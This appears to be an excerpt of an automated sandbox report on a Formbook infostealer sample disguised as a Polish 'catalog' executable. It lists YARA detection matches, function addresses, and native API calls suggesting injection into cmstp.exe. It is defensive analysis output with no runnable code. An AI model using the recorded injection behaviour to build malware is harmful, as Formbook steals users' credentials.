          Source: 00000001.00000002.426662087.0000000000CE0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.426692042.0000000000D10000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.426692042.0000000000D10000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.618855079.0000000002860000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.618855079.0000000002860000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.361409947.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.361409947.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.618002873.0000000000180000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.618002873.0000000000180000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.364413709.000000000E840000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.364413709.000000000E840000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.412735019.000000000F6E6000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.412735019.000000000F6E6000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.425753060.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.425753060.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.395866901.000000000F6E6000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.395866901.000000000F6E6000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.358925915.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000000.358925915.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.360578387.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000000.360578387.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_0040312A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040312A
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_004063540_2_00406354
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_004048020_2_00404802
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_00406B2B0_2_00406B2B
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_10004E3E0_2_10004E3E
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_100037700_2_10003770
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_1000C4610_2_1000C461
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_1000AC820_2_1000AC82
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_100095740_2_10009574
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_1000B1F40_2_1000B1F4
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_10015A1A0_2_10015A1A
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_10015A290_2_10015A29
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_1000A7100_2_1000A710
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_1000D3CD0_2_1000D3CD
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_004010271_2_00401027
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_004010301_2_00401030
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_0041C94E1_2_0041C94E
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_0041BA191_2_0041BA19
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_0041C3F91_2_0041C3F9
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00408C901_2_00408C90
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00402D901_2_00402D90
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_0041BF221_2_0041BF22
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00402FB01_2_00402FB0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A820A81_2_00A820A8
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009CB0901_2_009CB090
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E20A01_2_009E20A0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A828EC1_2_00A828EC
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A710021_2_00A71002
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009BF9001_2_009BF900
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009D41201_2_009D4120
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A822AE1_2_00A822AE
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009EEBB01_2_009EEBB0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A7DBD21_2_00A7DBD2
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A82B281_2_00A82B28
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C841F1_2_009C841F
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A7D4661_2_00A7D466
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E25811_2_009E2581
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A825DD1_2_00A825DD
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009CD5E01_2_009CD5E0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A82D071_2_00A82D07
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009B0D201_2_009B0D20
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A81D551_2_00A81D55
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A82EF71_2_00A82EF7
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009D6E301_2_009D6E30
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A81FF11_2_00A81FF1
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_004010271_1_00401027
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_004010301_1_00401030
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_0041C94E1_1_0041C94E
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_0041BA191_1_0041BA19
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_0041C3F91_1_0041C3F9
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_00408C901_1_00408C90
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_00402D901_1_00402D90
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_0041BF221_1_0041BF22
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_00402FB01_1_00402FB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0470D46611_2_0470D466
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0470100211_2_04701002
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0465841F11_2_0465841F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_047128EC11_2_047128EC
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046720A011_2_046720A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_047120A811_2_047120A8
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0465B09011_2_0465B090
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04711D5511_2_04711D55
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04640D2011_2_04640D20
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0466412011_2_04664120
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0464F90011_2_0464F900
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04712D0711_2_04712D07
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0465D5E011_2_0465D5E0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_047125DD11_2_047125DD
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0467258111_2_04672581
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04666E3011_2_04666E30
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04712EF711_2_04712EF7
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_047122AE11_2_047122AE
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04712B2811_2_04712B28
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04711FF111_2_04711FF1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0470DBD211_2_0470DBD2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0467EBB011_2_0467EBB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0297C94E11_2_0297C94E
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_02962FB011_2_02962FB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_02968C9011_2_02968C90
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_02962D9011_2_02962D90
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: String function: 0041A4B0 appears 38 times
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: String function: 009BB150 appears 35 times
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: String function: 0464B150 appears 35 times
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_004185D0 NtCreateFile,1_2_004185D0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00418680 NtReadFile,1_2_00418680
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00418700 NtClose,1_2_00418700
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_004187B0 NtAllocateVirtualMemory,1_2_004187B0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_004185CD NtCreateFile,1_2_004185CD
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_0041867E NtReadFile,1_2_0041867E
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_004186FA NtClose,1_2_004186FA
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_004187AA NtAllocateVirtualMemory,1_2_004187AA
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F98F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_009F98F0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9840 NtDelayExecution,LdrInitializeThunk,1_2_009F9840
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9860 NtQuerySystemInformation,LdrInitializeThunk,1_2_009F9860
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F99A0 NtCreateSection,LdrInitializeThunk,1_2_009F99A0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_009F9910
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_009F9A00
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9A20 NtResumeThread,LdrInitializeThunk,1_2_009F9A20
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9A50 NtCreateFile,LdrInitializeThunk,1_2_009F9A50
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F95D0 NtClose,LdrInitializeThunk,1_2_009F95D0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9540 NtReadFile,LdrInitializeThunk,1_2_009F9540
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F96E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_009F96E0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_009F9660
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9780 NtMapViewOfSection,LdrInitializeThunk,1_2_009F9780
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F97A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_009F97A0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9FE0 NtCreateMutant,LdrInitializeThunk,1_2_009F9FE0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9710 NtQueryInformationToken,LdrInitializeThunk,1_2_009F9710
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F98A0 NtWriteVirtualMemory,1_2_009F98A0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9820 NtEnumerateKey,1_2_009F9820
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009FB040 NtSuspendThread,1_2_009FB040
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F99D0 NtCreateProcessEx,1_2_009F99D0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9950 NtQueueApcThread,1_2_009F9950
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9A80 NtOpenDirectoryObject,1_2_009F9A80
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9A10 NtQuerySection,1_2_009F9A10
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009FA3B0 NtGetContextThread,1_2_009FA3B0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9B00 NtSetValueKey,1_2_009F9B00
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F95F0 NtQueryInformationFile,1_2_009F95F0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009FAD30 NtSetContextThread,1_2_009FAD30
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9520 NtWaitForSingleObject,1_2_009F9520
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9560 NtWriteFile,1_2_009F9560
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F96D0 NtCreateKey,1_2_009F96D0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9610 NtEnumerateValueKey,1_2_009F9610
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9650 NtQueryValueKey,1_2_009F9650
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9670 NtQueryInformationProcess,1_2_009F9670
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009FA710 NtOpenProcessToken,1_2_009FA710
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9730 NtQueryVirtualMemory,1_2_009F9730
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9770 NtSetInformationFile,1_2_009F9770
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009FA770 NtOpenThread,1_2_009FA770
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9760 NtOpenProcess,1_2_009F9760
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_004185D0 NtCreateFile,1_1_004185D0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_00418680 NtReadFile,1_1_00418680
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_00418700 NtClose,1_1_00418700
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_004187B0 NtAllocateVirtualMemory,1_1_004187B0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_004185CD NtCreateFile,1_1_004185CD
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_0041867E NtReadFile,1_1_0041867E
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_004186FA NtClose,1_1_004186FA
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_004187AA NtAllocateVirtualMemory,1_1_004187AA
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689860 NtQuerySystemInformation,LdrInitializeThunk,11_2_04689860
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689840 NtDelayExecution,LdrInitializeThunk,11_2_04689840
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689540 NtReadFile,LdrInitializeThunk,11_2_04689540
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689910 NtAdjustPrivilegesToken,LdrInitializeThunk,11_2_04689910
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046895D0 NtClose,LdrInitializeThunk,11_2_046895D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046899A0 NtCreateSection,LdrInitializeThunk,11_2_046899A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689660 NtAllocateVirtualMemory,LdrInitializeThunk,11_2_04689660
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689650 NtQueryValueKey,LdrInitializeThunk,11_2_04689650
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689A50 NtCreateFile,LdrInitializeThunk,11_2_04689A50
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046896E0 NtFreeVirtualMemory,LdrInitializeThunk,11_2_046896E0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046896D0 NtCreateKey,LdrInitializeThunk,11_2_046896D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689710 NtQueryInformationToken,LdrInitializeThunk,11_2_04689710
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689FE0 NtCreateMutant,LdrInitializeThunk,11_2_04689FE0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689780 NtMapViewOfSection,LdrInitializeThunk,11_2_04689780
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0468B040 NtSuspendThread,11_2_0468B040
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689820 NtEnumerateKey,11_2_04689820
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046898F0 NtReadVirtualMemory,11_2_046898F0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046898A0 NtWriteVirtualMemory,11_2_046898A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689560 NtWriteFile,11_2_04689560
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689950 NtQueueApcThread,11_2_04689950
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689520 NtWaitForSingleObject,11_2_04689520
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0468AD30 NtSetContextThread,11_2_0468AD30
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046895F0 NtQueryInformationFile,11_2_046895F0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046899D0 NtCreateProcessEx,11_2_046899D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689670 NtQueryInformationProcess,11_2_04689670
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689A20 NtResumeThread,11_2_04689A20
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689A00 NtProtectVirtualMemory,11_2_04689A00
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689610 NtEnumerateValueKey,11_2_04689610
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689A10 NtQuerySection,11_2_04689A10
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689A80 NtOpenDirectoryObject,11_2_04689A80
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689760 NtOpenProcess,11_2_04689760
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689770 NtSetInformationFile,11_2_04689770
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0468A770 NtOpenThread,11_2_0468A770
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689730 NtQueryVirtualMemory,11_2_04689730
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689B00 NtSetValueKey,11_2_04689B00
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0468A710 NtOpenProcessToken,11_2_0468A710
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046897A0 NtUnmapViewOfSection,11_2_046897A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0468A3B0 NtGetContextThread,11_2_0468A3B0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_02978680 NtReadFile,11_2_02978680
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_029787B0 NtAllocateVirtualMemory,11_2_029787B0
